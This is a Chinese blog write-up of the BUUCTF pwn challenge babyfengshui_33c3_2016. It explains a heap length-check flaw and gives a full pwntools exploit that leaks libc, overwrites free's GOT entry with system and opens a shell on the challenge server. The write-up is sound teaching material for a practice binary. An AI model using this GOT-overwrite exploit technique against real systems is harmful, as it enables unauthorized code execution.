buuctf babyfengshui_33c3_2016

最新推荐文章于 2024-01-24 03:30:33 发布
最新推荐文章于 2024-01-24 03:30:33 发布
阅读量395 收藏 3
点赞数 5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45677731/article/details/108093060
版权

这是四个主要的函数:
add函数:
在这里插入图片描述
add函数的输入部分:
在这里插入图片描述
同时,这也是update函数,其实这个函数是有溢出的漏洞的,它对于长度的检查是有问题的,后面就会利用到这一点
delete函数:
在这里插入图片描述
display函数:
在这里插入图片描述
先随意创建几个chunk,看看布局,

add(0x80,"nam1",0x80,"aaaa")
add(0x80,"nam2",0x80,"bbbb")
add(0x80,"nam3",0x80,"cccc")

在这里插入图片描述
以第一个为例,储存text的chunk在前,后面是储存name的chunk,储存着name和chunk0的指针,再来看看程序对于输入长度的检查:
在这里插入图片描述
对于chunk0来说,就是0x80c008+输入长度是否大于0x804c08c,但是,有一个问题就是,chunk0和chunk0(name)其实不一定是相邻的,这样的话就有了实现溢出的可能

add(0x80,"nam1",0x80,"aaaa")
add(0x80,"nam2",0x80,"bbbb")
add(0x80,"nam3",0x80,"/bin/sh\x00")
delete(0)
add(0x100,'nam1',0x100,"cccc")

这样一步过后,新申请的chunk3会在chunk1和chunk2的前面,chunk3(name)则会在chunk1和chunk2的后面,这样就可以输入很长的数据了

payload='a'*0x108+'a'*0x8+'a'*0x80+'a'*0x8+p32(free_got)
update(3,0x200,payload)

把chunk1(name)处存储的chunk1指针改成free_got的地址

show(1)
sh.recvuntil("description: ")
free_addr=u32(sh.recv(4))
libc=LibcSearcher("free",free_addr)
libc_base=free_addr-libc.dump("free")
system_addr=libc_base+libc.dump("system")

输出free函数的地址,计算出system函数的地址

update(1,0x80,p32(system_addr))
delete(2)
sh.interactive()

把free函数的地址修改为system函数的地址,由于chunk2里存的是”/bin/sh“,这时候执行free(chunk2)就相当于执行system("/bin/sh")
完整exp:

from pwn import *
from LibcSearcher import LibcSearcher
context.log_level='debug'
sh=remote("node3.buuoj.cn",25902)
elf=ELF('./babyfengshui_33c3_2016')
puts_got=elf.got['puts']
free_got=elf.got['free']

def add(size,name,length,text):
	sh.recvuntil("Action: ")
	sh.sendline("0")
	sh.sendlineafter("size of description: ",str(size))
	sh.sendlineafter("name: ",name)
	sh.recvuntil("text length:")
	sh.sendline(str(length))
	sh.recvuntil("text:")
	sh.sendline(text)
def delete(index):
	sh.recvuntil("Action: ")
	sh.sendline("1")
	sh.recvuntil("index: ")
	sh.sendline(str(index))
def show(index):
	sh.recvuntil("Action: ")
	sh.sendline("2")
	sh.recvuntil("index: ")
	sh.sendline(str(index))
def update(index,length,text):
	sh.recvuntil("Action: ")
	sh.sendline("3")
	sh.recvuntil("index: ")
	sh.sendline(str(index))
	sh.recvuntil("text length: ")
	sh.sendline(str(length))
	sh.recvuntil("text: ")
	sh.sendline(text)

add(0x80,"nam1",0x80,"aaaa")
add(0x80,"nam2",0x80,"bbbb")
add(0x80,"nam3",0x80,"/bin/sh\x00")
delete(0)
add(0x100,'nam1',0x100,"cccc")
payload='a'*0x108+'a'*0x8+'a'*0x80+'a'*0x8+p32(free_got)
update(3,0x200,payload)
show(1)
sh.recvuntil("description: ")
free_addr=u32(sh.recv(4))
libc=LibcSearcher("free",free_addr)
libc_base=free_addr-libc.dump("free")
system_addr=libc_base+libc.dump("system")
update(1,0x80,p32(system_addr))
delete(2)
sh.interactive()
R1nd0
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
UC10_入库用例描述1
08-08
**33c:位置不存在** - 若输入的存储位置在仓库布局中找不到,系统会提示该位置不存在,需要检查并重新输入正确的位置信息。 **33d:取消输入** - 仓库管理人员可以选择取消输入,系统会提示已取消并结束当前的入库...
Android代码-33C3 FahrPlan Schedule
08-06
This was a fork from tuxmobils FahrPlan application for 33C3 purposes. This fork is not active anymore - please head over to confi for the next iteration
BUUCTF pwn babyfengshui_33c3_2016(简单堆)
菜的只能随便写写博客
02-17 2012
0x01 文件分析   0x02 运行  程序提供了几个简单的功能,增删改查都有。运行的时候程序有定时机制,可以用IDA的patch功能修改二进制指令,消除定时。   0x03 静态分析 主函数: void __cdecl __noreturn main() { char v0; // [esp+3h] [ebp-15h] int v1; // [esp+4h] [ebp-14h] ...
buuctf-babyfengshui_33c3_2016
weixin_48807177的博客
05-04 648
ubuntu16 Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x8048000) //没开 基本就这里有点问题 if ( (char *)(v3 + *(_DWORD *)ptr[a1]) >= (char *)ptr[a1] - 4 ) 而重点则是在ed...
[BUUCTF]PWN——babyfengshui_33c3_2016
mcmuyanga的博客
01-02 588
babyfengshui_33c3_2016 附件 步骤: 例行检查,32位程序,开启了cannary和nx 本地运行一下看看大概的情况,熟悉的堆的菜单布局 32位ida载入,看main函数 add update delete display 上面看到了update在判断长度的时候存在问题,它的长度判断根据是:以chunk0来说,以chunk0的地址加上chunk0的长度是否等于chunk0name的地址来判断的,但是,有一个问题就是,chunk0和chunk0(name)其实不一定是相邻的
babyfengshui_33c3_2016[堆溢出]
、moddemod
06-26 344
未来的你 = 你的热情 + 你的努力 + 那么微不足道的天赋 其实做pwn题我感觉都是只可意会,但并非不可言传,只是说了感觉和说废话一样,没有什么实质性的作用,最最重要的是要自己多去操作调试,pwn多了也就那样吧!但是最核心的永远是你coding的能力!虽然在干着逆向的事,但是coding的能力决定了你的高度! ----小白感悟 这道题问题出现在更新的时候边界的判断方法有问题,结合的堆的机制,就可以形成堆溢出! 添加一个用户会申请两个chunk,后一个chunk的内容为.
【buu】babyfengshui_33c3_2016(详细题解)
qq_62068476的博客
03-15 307
buu日常一题
wd33c93.rar_Linux/Unix编程_Unix_Linux_
08-11
标题“wd33c93.rar_Linux/Unix编程_Unix_Linux_”暗示了这是一个与Linux或Unix系统相关的编程资源,可能是一个源代码库或者一个驱动程序的实现,其中“wd33c93”可能是设备驱动的名字,可能是针对某种特定硬件的,如...
robomongo-0.9.0-rc10-windows-x86_64
10-31
根据压缩包子文件的文件名称"robomongo-0.9.0-rc10-windows-x86_64-33c89ea.exe",我们可以推断这个文件是RoboMongo的安装程序,后缀".exe"表明它是Windows平台下的可执行文件,而"33c89ea"可能是这个特定构建的唯一...
]@NR_S%%P}33C@9SFA58)VU.png
最新发布
05-19
]@NR_S%%P}33C@9SFA58)VU.png
babyfengshui_33c3_2016题解
coco的博客
12-09 897
这道题还是比较基础的堆题,泄漏libc和get shell都比较基础。需要注意的是以下几点: 输入长度限制的绕过方法值得学习一下。 泄漏libc时将free got表中写入puts.plt是不可行的,因为这道题的输入结束时候会带上\x00,这样就会破坏free got表的下一项fgets got,导致程序运行失败。 我最后本机上运行成功,但是远程打不通,后来经过发现是因为libc的版本不一样,导...
babyfengshui_33c3_2016
qq_33590156的博客
08-04 135
利用堆申请机制绕过溢出检查,关键点在edit中,后指针小于前指针则满足条件,但是如果将后指针挤到后面去,则可以溢出。 from pwn import * from LibcSearcher import * context(os='linux',arch='i386',log_level='debug') ms = remote("node3.buuoj.cn",29869) #ms = process("./33c3") elf = ELF("./33c3") def add(size,name,l
babyfengshui_33c3_2016的wp
wuyvle的博客
03-05 150
这是个相当好的堆题 add函数 可以看出这是个结构体 struct Node{ char * description; char name[0x7C]; } s便是description的空间地址,而v2则是结构体的空间。 delete函数 display update 这里限制了输入的长度 对于chunk0来说,就是0x80c008+输入长度是否大于0x804c08c,但是,有一个问题就是,chunk0和chunk0(name)其实不一定是相邻的,这样的话就有了实现溢出的可能 add(0x8
babyfengshui_33c3_2016 -- house of spirit
huzai9527的博客
03-17 113
本题主要就是看懂一条判断溢出的if语句 结构体是怎么看出来的 代码上看 struct{ char *text; char name[124]; } 从内存上看 思路 step4 的关于408哪里来的 看内存地址,计算chunk3的content到chunk1的struct即可 exp from pwn import * p = remote('node3.buuoj.cn',29853) #p = process('./babyfengshui_33c3_20
[BUUCTF]-PWN:babyfengshui_33c3_2016解析
2301_79326813的博客
01-24 649
又是一道堆题,先看保护关键信息是32位,没开pie直接看ida大致是alloc创建堆块,free释放堆块,show查看堆块内容,fill填充堆块内容其他的都没啥关键的要讲,但alloc那里非常需要解析一下解释如上图再具体一点就是 我们输入的字节大小+堆块地址>=相邻0x80堆块的地址时会被强制退出必须要 我们输入的字节大小+堆块地址
babyfengshui__BUUCTF
Jc
09-29 570
其实这个题用了两天,第一天拿上题的时候比较浮躁,也没什么分析的效果,把题做出来了,写个文章大家分析交流 我看网上大家都说这个题适合入门堆得看,其实我感觉要是没接触过堆得话,理解起来还是比较困难的,我会将自己做题的思路记录下来,让大家少踩点坑 做题思路 1.查看安全机制/文件信息 2.分析IDA,梳理思路很重要 3.分析构造漏洞利用(其实自己都是一步步来的,毕竟还是个小白呢) 4.编写EXP文件 安...
【CTF】【PWN】胎教向babyfengshui_33c3_2016题解
m0_50819561的博客
10-12 283
跳过checksec,我们直接分析程序。 我这里把这些函数命名为add,delete,display,edit。 先看add。 就是创建两个chunk,一个的地址存放在s里,一个的地址存放在v2里。 然后把s存在v2指向的地址里,用一个名为ptr的数组存放v2。 可以看出来,我们创建了两个chunk。按顺序命名为chunk1和chunk2.我们把这两个chunk看作是一个user的两部分。显然,chunk1存放了user的内容,chunk2存放了user的内容的地址和user的名字。 其中name
(攻防世界)(pwn)babyfengshui
PLpa的博客
08-03 1295
入门级的堆题,拿来学习还是不错的。 做这道题之前,最好还是先对堆的数据结构有一定的了解。 拿到题目,下载附件,查看保护。 一个32位的程序,开了NX和Canary保护,这都不是重头戏毕竟这题不用栈,栈保护只是锦上添花罢了。 把文件拖进IDA查看逻辑: 可以看到,典型的菜单题,这很pwn,实现了增删改查四个功能,像极了C语言程序设计的期末结业程序设计题哈哈哈,暴露年龄。 进入增加用户功能: 可...
function _0x231129(_0x3470a4, _0x33c734) { var _0x113967 = _0xcc2e8a; if (_0x3773be[_0x113967(0x1d1)](_0x3773be[_0x113967(0x1cf)], _0x3773be[_0x113967(0x189)])) { var _0x44d653 = _0x29fb8c['a'][_0x113967(0x1ea)][_0x113967(0x1b7)][_0x113967(0x1e5)](_0x3773be[_0x113967(0x19e)]) , _0x237af1 = _0x29fb8c['a'][_0x113967(0x1ea)][_0x113967(0x1b7)][_0x113967(0x1e5)](_0x3773be[_0x113967(0x18b)]) , _0x90d961 = _0x3773be[_0x113967(0x1f5)] , _0x1a9696 = _0x29fb8c['a'][_0x113967(0x1ea)][_0x113967(0x1ad)][_0x113967(0x1e5)](_0x90d961) , _0x1b534c = _0x29fb8c['a'][_0x113967(0x1ea)][_0x113967(0x199)][_0x113967(0x186)](_0x1a9696) , _0x4430e9 = _0x29fb8c['a'][_0x113967(0x1bf)][_0x113967(0x1fe)](_0x1b534c, _0x44d653, { 'iv': _0x237af1, 'mode': _0x29fb8c['a'][_0x113967(0x1c1)][_0x113967(0x1fb)], 'padding': _0x29fb8c['a'][_0x113967(0x1f4)][_0x113967(0x18d)] }) , _0x514a58 = _0x4430e9[_0x113967(0x1f1)](_0x29fb8c['a'][_0x113967(0x1ea)][_0x113967(0x1b7)]) , _0x98aae0 = _0x514a58[_0x113967(0x1f1)]() , _0x531103 = _0x3773be[_0x113967(0x18c)](Object, _0x4a5bdd['j'])(_0x3470a4) ? '' : _0x3773be[_0x113967(0x1fd)](_0x3470a4[_0x113967(0x194)](0xb, 0xc), _0x3470a4[_0x113967(0x1f9)](-0x4)); _0x531103 = _0x3773be[_0x113967(0x1fd)](_0x3773be[_0x113967(0x198)](_0x531103, _0x33c734[_0x113967(0x1f9)](-0x4)), _0x33c734[_0x113967(0x194)](0x0, 0x3)); var _0x454e4e = new _0x2188d5['a'](); return _0x454e4e[_0x113967(0x1e2)](_0x3773be[_0x113967(0x198)](_0x3773be[_0x113967(0x193)](_0x3773be[_0x113967(0x1cd)], _0x98aae0), _0x3773be[_0x113967(0x1f0)])), _0x454e4e[_0x113967(0x1b6)](_0x531103); } else { var _0x30a783 = _0x1816ee ? function() { var _0x423bcc = _0x113967; if (_0x2d57e1) { var _0x1122f3 = _0x4a1468[_0x423bcc(0x1fc)](_0x3cb105, arguments); return _0x26b175 = null, _0x1122f3; } } : function() {} ; return _0x140c19 = ![], _0x30a783; } }这段代码请用php帮我写出来
07-14
这是一个名为 `_0x231129` 的函数,接受两个参数 `_0x3470a4` 和 `_0x33c734`。函数体中有一个条件语句,根据条件的不同执行不同的逻辑。 如果条件满足,则执行加密操作。代码中使用了一些变量和函数,它们可能是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值